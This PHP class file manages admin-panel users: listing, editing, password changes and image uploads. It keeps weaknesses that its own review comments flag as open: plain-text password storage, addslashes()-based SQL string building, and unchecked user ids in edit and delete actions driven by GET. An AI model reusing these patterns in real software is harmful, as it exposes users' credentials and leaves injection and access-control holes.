
Current File : /home/easwari/www/includes/classes/class.User.php

<?php
#####Class For Adding Content Management ######
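/**
 * User administration model backed by the `user_master` table: listing,
 * creating, editing and flagging users, plus password and profile-image changes.
 *
 * Notes for maintainers:
 *  - Every statement is built as a string and handed to ExecuteQuery(). All
 *    request and session values go through userSqlEscape() before they are
 *    concatenated. That helper uses addslashes(), which InsertUser already
 *    relied on; it is not charset-aware. TODO: switch to bound parameters or
 *    the driver's own escaping once the parent class offers them.
 *  - Passwords are written to `user_master`.`password` as plain text. Hashing
 *    them here would break whatever code verifies logins, so it is only
 *    flagged - NOTE(review): migrate to password_hash()/password_verify()
 *    together with the login code.
 *  - UserEditView, EditUser and DeleteMaster take the target user id from the
 *    request and do not compare it with the session. NOTE(review): confirm the
 *    calling pages enforce authorization before these methods run.
 */
class User extends MysqlFns{

/**
 * Constructor. Defined as __construct() so it also runs on PHP versions that
 * no longer treat a method named after the class as the constructor.
 */
function __construct()
{
	// $config has to be imported before it is read; the previous code read it
	// first, which left LDDisplayPath without the SiteGlobalPath prefix.
	global $config;
	$this->LDDisplayPath = $config['SiteGlobalPath'] . "class.User.php";
	$this->MysqlFns();
	$this->Limit = 20;
}

/** Legacy PHP 4 style constructor name, kept for callers that invoke it directly. */
function User()
{
	$this->__construct();
}

/**
 * Fetch one request/session value as a string.
 *
 * @param mixed  $source array to read from ($_GET, $_POST, $_SESSION, form array)
 * @param string $key    key to read
 * @return string the value, or '' when it is missing or not a scalar
 */
private function userInput($source, $key)
{
	if (!is_array($source) || !isset($source[$key]) || !is_scalar($source[$key])) {
		return '';
	}
	return (string) $source[$key];
}

/**
 * Escape a value for use inside a double-quoted SQL string literal.
 *
 * @param mixed $value value to escape
 * @return string escaped text ('' for non-scalar input)
 */
private function userSqlEscape($value)
{
	if (!is_scalar($value)) {
		return '';
	}
	// Stopgap shared by every query in this class; see the class docblock.
	return addslashes((string) $value);
}

/**
 * Check that each listed field is present and non-blank.
 *
 * @param mixed $objArray submitted form values
 * @param array $required map of field name => error message, checked in order
 * @return bool false (after assigning ErrorMessage) on the first blank field
 */
private function userRequireFields($objArray, $required)
{
	global $objSmarty;
	foreach ($required as $field => $message) {
		if (!is_array($objArray) || empty($objArray[$field]) || !is_scalar($objArray[$field])) {
			$objSmarty->assign('ErrorMessage', $message);
			return false;
		}
	}
	return true;
}

/**
 * Tell whether the named file field carries an upload.
 *
 * @param string $field key in $_FILES
 * @return bool
 */
private function userHasUpload($field)
{
	return isset($_FILES[$field]['name'])
		&& is_string($_FILES[$field]['name'])
		&& $_FILES[$field]['name'] !== '';
}

/**
 * Validate an uploaded image and move it into $config['UserImageUpload'].
 *
 * The browser-supplied MIME type and file name are both attacker-controlled,
 * so neither is trusted: the type is taken from the file's own header via
 * getimagesize(), and the stored name is generated here with an extension
 * derived from that detected type. The previous code kept the extension of
 * the client file name, so a script sent with an image Content-Type would be
 * stored with its script extension.
 *
 * @param string $field       key in $_FILES
 * @param int    $maxsize     size limit in bytes (exclusive)
 * @param string $sizeMessage ErrorMessage for an empty, failed or oversized upload
 * @param string $typeMessage ErrorMessage for content that is not JPEG, GIF or PNG
 * @return string|false stored file name, or false after assigning ErrorMessage
 */
private function userStoreImage($field, $maxsize, $sizeMessage, $typeMessage)
{
	global $objSmarty, $config;

	$file = $_FILES[$field];
	$size = (isset($file['size']) && is_int($file['size'])) ? $file['size'] : 0;
	$received = isset($file['error']) && $file['error'] === UPLOAD_ERR_OK
		&& isset($file['tmp_name']) && is_string($file['tmp_name']);

	// A failed upload reports size 0, which the original also answered with
	// the size message.
	if (!$received || $size == 0 || $size >= $maxsize) {
		$objSmarty->assign('ErrorMessage', $sizeMessage);
		return false;
	}

	$extensions = array(
		IMAGETYPE_JPEG => 'jpg',
		IMAGETYPE_GIF  => 'gif',
		IMAGETYPE_PNG  => 'png',
	);
	$info = getimagesize($file['tmp_name']);
	if ($info === false || !isset($extensions[$info[2]])) {
		$objSmarty->assign('ErrorMessage', $typeMessage);
		return false;
	}

	// getimagesize() only inspects the header, so the fixed extension is what
	// keeps the stored file from being treated as a script. The upload
	// directory should additionally be configured not to execute scripts.
	$stored = uniqid(round(microtime(true)) . '_') . '.' . $extensions[$info[2]];
	$target = $config['UserImageUpload'] . $stored;

	if (!move_uploaded_file($file['tmp_name'], $target)) {
		// Previously the file name was written to the database even when the
		// move had failed.
		$objSmarty->assign('ErrorMessage', 'Image could not be saved');
		return false;
	}
	// Images need no execute bit; the old chmod "755" was also passed as a
	// string, which PHP reads as decimal 755 rather than octal 0755.
	chmod($target, 0644);
	return $stored;
}

/**
 * List active users, optionally filtered by $_POST['table_search'].
 *
 * Sessions whose Web_USER_GROUP is not "Super Admin" never receive Super Admin
 * rows. The original applied that filter only when no search term was sent,
 * so a search returned those rows to everyone. The `password` column is no
 * longer searchable: matching it with LIKE let any user of the search box
 * test guesses against other users' passwords.
 *
 * NOTE(review): SELECT * still hands the `password` column to the template.
 *
 * @param mixed $objArray unused
 * @return mixed whatever ExecuteQuery() returns for the select
 */
function ListUser($objArray)
{
	global $objSmarty;

	$term = $this->userInput($_POST, 'table_search');
	$isSuperAdmin = isset($_SESSION['Web_USER_GROUP'])
		&& $_SESSION['Web_USER_GROUP'] == 'Super Admin';

	$where = 'emp_status="1"';
	if (!$isSuperAdmin) {
		$where .= ' AND usergroup != "Super Admin"';
	}

	if ($term !== '') {
		$like = '"%' . $this->userSqlEscape($term) . '%"';
		$matches = array();
		foreach (array('empname', 'usergroup', 'isactive', 'mobileno', 'phone', 'emailid') as $column) {
			$matches[] = $column . ' like ' . $like;
		}
		$where .= ' AND (' . implode(' OR ', $matches) . ')';
		$order = 'empdesignation';
	} else {
		$order = $isSuperAdmin ? 'empname' : 'empdesignation';
	}

	$SelQuery = 'SELECT  * FROM `user_master` WHERE ' . $where . ' ORDER BY ' . $order . ' ASC';
	$ListView = $this->ExecuteQuery($SelQuery, "select");
	$objSmarty->assign('ListView', $ListView);
	return $ListView;
}

/**
 * List active user groups other than "Super Admin".
 *
 * @param mixed $objArray unused
 * @return mixed result of the select
 */
function ListUserGroup($objArray)
{
	global $objSmarty;
	$SelQuery = 'SELECT  * FROM `user_group_master` WHERE usergroupName !="Super Admin" AND status="1"';
	$ListGroup = $this->ExecuteQuery($SelQuery, "select");
	$objSmarty->assign('ListGroup', $ListGroup);
	return $ListGroup;
}

/**
 * List active designations other than "Super Admin".
 *
 * @param mixed $objArray unused
 * @return mixed result of the select
 */
function ListEmpDesignation($objArray)
{
	global $objSmarty;
	$SelQuery = 'SELECT  * FROM `designation_master` WHERE designation_name !="Super Admin" AND isactive="1"';
	$ListDesig = $this->ExecuteQuery($SelQuery, "select");
	$objSmarty->assign('ListDesig', $ListDesig);
	return $ListDesig;
}

/**
 * Count the rows of `user_master` with emp_status = 1.
 *
 * The company id the original decoded from the request was never used in the
 * query, so it is no longer read.
 *
 * @param mixed $objArray unused
 * @return mixed result of the select (column userCount)
 */
function GetUserCount($objArray)
{
	global $objSmarty;
	$SelQuery = 'SELECT  COUNT(`user_master`.slNo) as userCount FROM `user_master` WHERE `user_master`.emp_status="1"';
	$ListuserCount = $this->ExecuteQuery($SelQuery, "select");
	$objSmarty->assign('ListuserCount', $ListuserCount);
	return $ListuserCount;
}

/**
 * Load one user row for the edit form.
 *
 * The id is the base64-decoded $_GET['userId'] when present, otherwise the
 * session's Web_User_ID.
 *
 * NOTE(review): the requested id is not compared with the session, and the
 * row includes the plain-text password - confirm the caller restricts who may
 * open another user's record.
 *
 * @param mixed $objArray unused
 * @return mixed result of the select
 */
function UserEditView($objArray)
{
	global $objSmarty;

	$requested = $this->userInput($_GET, 'userId');
	if ($requested !== '') {
		$sid = base64_decode($requested);
	} else {
		$sid = $this->userInput($_SESSION, 'Web_User_ID');
	}

	$SelQuery = 'SELECT * FROM `user_master` WHERE slNo="' . $this->userSqlEscape($sid) . '" AND emp_status="1"';
	$ListEditView = $this->ExecuteQuery($SelQuery, "select");
	$objSmarty->assign('ListEditView', $ListEditView);
	return $ListEditView;
}

/**
 * Load the logged-in user's own row for the change-password form.
 *
 * @param mixed $objArray unused
 * @return mixed result of the select
 */
function UserEditViewChange($objArray)
{
	global $objSmarty;
	$SelQuery = 'SELECT * FROM `user_master` WHERE slNo="'
		. $this->userSqlEscape($this->userInput($_SESSION, 'Web_User_ID'))
		. '" AND emp_status="1"';
	$ListEditChange = $this->ExecuteQuery($SelQuery, "select");
	$objSmarty->assign('ListEditChange', $ListEditChange);
	return $ListEditChange;
}

/**
 * Change the logged-in user's password, then redirect back to the page.
 *
 * NOTE(review): the password is stored as plain text, and a second copy goes
 * into `re_password`; see the class docblock.
 *
 * @param mixed $objArray form values: new_password, retype_new_password, user_id
 * @return false|null false after assigning ErrorMessage when validation fails
 */
function ChangeUserPassword($objArray)
{
	global $objSmarty;

	$required = array(
		'new_password'        => 'Password should not be blank',
		'retype_new_password' => 'Confirm Password should not be blank',
	);
	if (!$this->userRequireFields($objArray, $required)) {
		return false;
	}

	$password = trim($this->userInput($objArray, 'new_password'));
	$retyped  = trim($this->userInput($objArray, 'retype_new_password'));
	// The confirmation field was collected but never compared before.
	if ($password !== $retyped) {
		$objSmarty->assign('ErrorMessage', 'Password and Confirm Password do not match');
		return false;
	}

	$UpQuery = 'UPDATE `user_master` SET `password` = "' . $this->userSqlEscape($password)
		. '",`re_password` = "' . $this->userSqlEscape($retyped)
		. '" WHERE `slNo` ="' . $this->userSqlEscape($this->userInput($_SESSION, 'Web_User_ID'))
		. '" AND `userName` ="' . $this->userSqlEscape($this->userInput($_SESSION, 'Web_UserName')) . '"';
	$this->ExecuteQuery($UpQuery, 'update');

	// user_id comes from the form, so it is URL-encoded before it is echoed
	// into the redirect target.
	header('Location:' . $_SERVER['PHP_SELF'] . '?success&user_id='
		. rawurlencode($this->userInput($objArray, 'user_id')) . '&window_action=true');
}

/**
 * Replace the logged-in user's profile image, then redirect back to the page.
 *
 * Fixes over the previous version: a leftover debug "echo ...; exit;" ended
 * the request before any new file was stored, the UPDATE statement was echoed
 * to the client (which also defeats the redirect header), and the removed
 * split() call has been dropped.
 *
 * NOTE(review): the type message mentions PDF although only JPEG, GIF and PNG
 * are accepted.
 *
 * @param mixed $objArray form values: userLogo, user_id
 * @param mixed $objFiles unused
 * @return false|null false after assigning ErrorMessage when validation fails
 */
function ChangeUserImage($objArray,$objFiles)
{
	global $objSmarty;

	if (!$this->userRequireFields($objArray, array('userLogo' => 'User Image should not be blank'))) {
		return false;
	}

	$f1 = "";
	if ($this->userHasUpload('userLogo')) {
		$f1 = $this->userStoreImage(
			'userLogo',
			5272880,
			'File --2-- too large. File must be less than 5 MB',
			'File --2-- Only PDF, JPG, JPEG, GIF and PNG types are accepted'
		);
		if ($f1 === false) {
			return false;
		}
	}

	$UpQuery = 'UPDATE `user_master` SET `userImage` = "' . $this->userSqlEscape($f1)
		. '" WHERE `slNo` ="' . $this->userSqlEscape($this->userInput($_SESSION, 'Web_User_ID'))
		. '" AND `userName` ="' . $this->userSqlEscape($this->userInput($_SESSION, 'Web_UserName')) . '"';
	$this->ExecuteQuery($UpQuery, 'update');

	header('Location:' . $_SERVER['PHP_SELF'] . '?success&user_id='
		. rawurlencode($this->userInput($objArray, 'user_id')) . '&window_action=true');
}

/**
 * Create a user row, then redirect to userList.php.
 *
 * NOTE(review): the image limit is 72880 bytes (about 71 KB) while the message
 * promises 1 MB, and the message omits GIF although GIF is accepted - confirm
 * which is intended. The password is stored as plain text; see the class
 * docblock.
 *
 * @param mixed $objArray form values: empName, userGroup, empCode, mobileNo,
 *                        empDesig, emailId, doj, password, re-password,
 *                        and optionally checkVal, phone
 * @return false|null false after assigning ErrorMessage when validation fails
 */
function InsertUser($objArray)
{
	global $objSmarty;

	$required = array(
		'empName'     => 'Employee Name should not be blank',
		'userGroup'   => 'User Group should not be blank',
		'empCode'     => 'Employee Code should not be blank',
		'mobileNo'    => 'Mobile No should not be blank',
		'empDesig'    => 'Employee Designation should not be blank',
		'emailId'     => 'Email Id should not be blank',
		'doj'         => 'Date of Joining should not be blank',
		'password'    => 'Password should not be blank',
		're-password' => 'Retype Password should not be blank',
	);
	if (!$this->userRequireFields($objArray, $required)) {
		return false;
	}
	// The retyped value was required but never compared before.
	if (trim($this->userInput($objArray, 'password')) !== trim($this->userInput($objArray, 're-password'))) {
		$objSmarty->assign('ErrorMessage', 'Password and Retype Password do not match');
		return false;
	}

	$f1 = "";
	if ($this->userHasUpload('profileImage')) {
		// The stored name is no longer echoed: output here would stop the
		// redirect header from being sent.
		$f1 = $this->userStoreImage(
			'profileImage',
			72880,
			'Image is too large. Image must be less than 1 MB',
			'Only JPG, JPEG and PNG types are accepted'
		);
		if ($f1 === false) {
			return false;
		}
	}

	$objSmarty->assign('empName', $this->userInput($objArray, 'empName'));

	$values = array(
		'empcode'        => $this->userInput($objArray, 'empCode'),
		'empname'        => $this->userInput($objArray, 'empName'),
		'empdesignation' => $this->userInput($objArray, 'empDesig'),
		'emp_doj'        => $this->userInput($objArray, 'doj'),
		'usergroup'      => $this->userInput($objArray, 'userGroup'),
		'userimage'      => $f1,
		'isactive'       => $this->userInput($objArray, 'checkVal'),
		'mobileno'       => $this->userInput($objArray, 'mobileNo'),
		'phone'          => $this->userInput($objArray, 'phone'),
		'emailid'        => $this->userInput($objArray, 'emailId'),
		'password'       => $this->userInput($objArray, 'password'),
		'emp_status'     => '1',
	);
	$columns = array();
	$literals = array();
	foreach ($values as $column => $value) {
		$columns[] = '`' . $column . '`';
		// Trim first, escape last, so nothing touches the text after escaping.
		$literals[] = '"' . $this->userSqlEscape(trim($value)) . '"';
	}
	$InsQuery = 'INSERT INTO `user_master` (' . implode(', ', $columns) . ') VALUES ('
		. implode(', ', $literals) . ')';
	$this->ExecuteQuery($InsQuery, 'insert');

	header('Location:userList.php?success_msg_for_insert');
}

/**
 * Update a user row identified by $objArray['userId'], then redirect to
 * userList.php. When userId is blank no statement is run but the redirect
 * still happens, as before.
 *
 * The previous version concatenated every field into the UPDATE without any
 * escaping, unlike InsertUser.
 *
 * NOTE(review): userId and userGroup both come from the form, so this method
 * by itself lets the submitter change any user's group - confirm the caller
 * checks the session's role first. The image limit/message mismatch noted on
 * InsertUser applies here too.
 *
 * @param mixed $objArray form values: userId, empName, userGroup, empCode,
 *                        mobileNo, empDesig, doj, emailId, password,
 *                        re-password, and optionally dor, checkVal, phone,
 *                        profileImageName
 * @return false|null false after assigning ErrorMessage when validation fails
 */
function EditUser($objArray="")
{
	global $objSmarty;

	$required = array(
		'empName'     => 'Employee Name should not be blank',
		'userGroup'   => 'User Group should not be blank',
		'empCode'     => 'Employee Code should not be blank',
		'mobileNo'    => 'Mobile No should not be blank',
		'empDesig'    => 'Employee Designation should not be blank',
		'doj'         => 'Date of Joining should not be blank',
		'emailId'     => 'Email Id should not be blank',
		'password'    => 'Password should not be blank',
		're-password' => 'Re-Password should not be blank',
	);
	if (!$this->userRequireFields($objArray, $required)) {
		return false;
	}
	if (trim($this->userInput($objArray, 'password')) !== trim($this->userInput($objArray, 're-password'))) {
		$objSmarty->assign('ErrorMessage', 'Password and Re-Password do not match');
		return false;
	}

	if ($this->userHasUpload('profileImage')) {
		$filename = $this->userStoreImage(
			'profileImage',
			72880,
			'Image is too large. Image must be less than 1 MB',
			'Only JPG, JPEG and PNG types are accepted'
		);
		if ($filename === false) {
			return false;
		}
	} else {
		// No new upload: keep the image name the form sent back, falling back
		// to the raw POST field as the original did.
		$filename = $this->userInput($objArray, 'profileImageName');
		if ($filename === '') {
			$filename = $this->userInput($_POST, 'profileImageName');
		}
	}

	$userId = $this->userInput($objArray, 'userId');
	$objSmarty->assign('userId', $userId);

	if (!empty($userId)) {
		$values = array(
			'empname'        => $this->userInput($objArray, 'empName'),
			'empcode'        => $this->userInput($objArray, 'empCode'),
			'empdesignation' => $this->userInput($objArray, 'empDesig'),
			'emp_doj'        => $this->userInput($objArray, 'doj'),
			'emp_dor'        => $this->userInput($objArray, 'dor'),
			'usergroup'      => $this->userInput($objArray, 'userGroup'),
			'userimage'      => $filename,
			'isactive'       => $this->userInput($objArray, 'checkVal'),
			'mobileno'       => $this->userInput($objArray, 'mobileNo'),
			'phone'          => $this->userInput($objArray, 'phone'),
			'emailid'        => $this->userInput($objArray, 'emailId'),
			'password'       => $this->userInput($objArray, 'password'),
		);
		$assignments = array();
		foreach ($values as $column => $value) {
			$assignments[] = '`' . $column . '` = "' . $this->userSqlEscape(trim($value)) . '"';
		}
		$UpQuery = 'UPDATE `user_master` SET ' . implode(', ', $assignments)
			. ' WHERE `slno` ="' . $this->userSqlEscape(trim($userId)) . '"';
		$this->ExecuteQuery($UpQuery, 'update');
	}

	header('Location:userList.php?success_msg_for_update');
}

/**
 * Flag a user row (status = 0), then redirect back to the page.
 *
 * The $sid argument is ignored, as before: the id is always the
 * base64-decoded $_GET['userId'].
 *
 * NOTE(review): this writes `status`, while every read in this class filters
 * on `emp_status` - confirm the intended column. It is also a state change
 * driven by a GET parameter with no check of the caller's role or a request
 * token; confirm the calling page covers both.
 *
 * @param mixed $sid unused
 * @return void
 */
function DeleteMaster($sid)
{
	$sid = base64_decode($this->userInput($_GET, 'userId'));
	$DelQuery = 'update `user_master` set `status`= 0 WHERE `slNo` ="' . $this->userSqlEscape($sid) . '"';
	$this->ExecuteQuery($DelQuery, 'update');
	header('Location:' . $_SERVER['PHP_SELF'] . '?succs_msg_for_del');
}

/**
 * Duplicate-address check: prints "<emailid>_yes" for every active row whose
 * emailid equals $_GET['checkemail'], and prints nothing when there is none.
 *
 * NOTE(review): the stored address is written to the response without HTML
 * encoding - confirm the response is only consumed as plain text.
 *
 * @param mixed $objArray unused
 * @return void
 */
function emailduplicate($objArray="")
{
	$SelQuery = 'SELECT * FROM `user_master` WHERE emailid="'
		. $this->userSqlEscape($this->userInput($_GET, 'checkemail'))
		. '" AND emp_status="1" AND isactive="1"';
	$eid = $this->ExecuteQuery($SelQuery, 'select');

	// Guard the loop: the result may be empty or not an array at all.
	if (empty($eid) || !is_array($eid)) {
		return;
	}
	foreach ($eid as $row) {
		echo $row["emailid"] . "_" . "yes";
	}
}
}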
?>


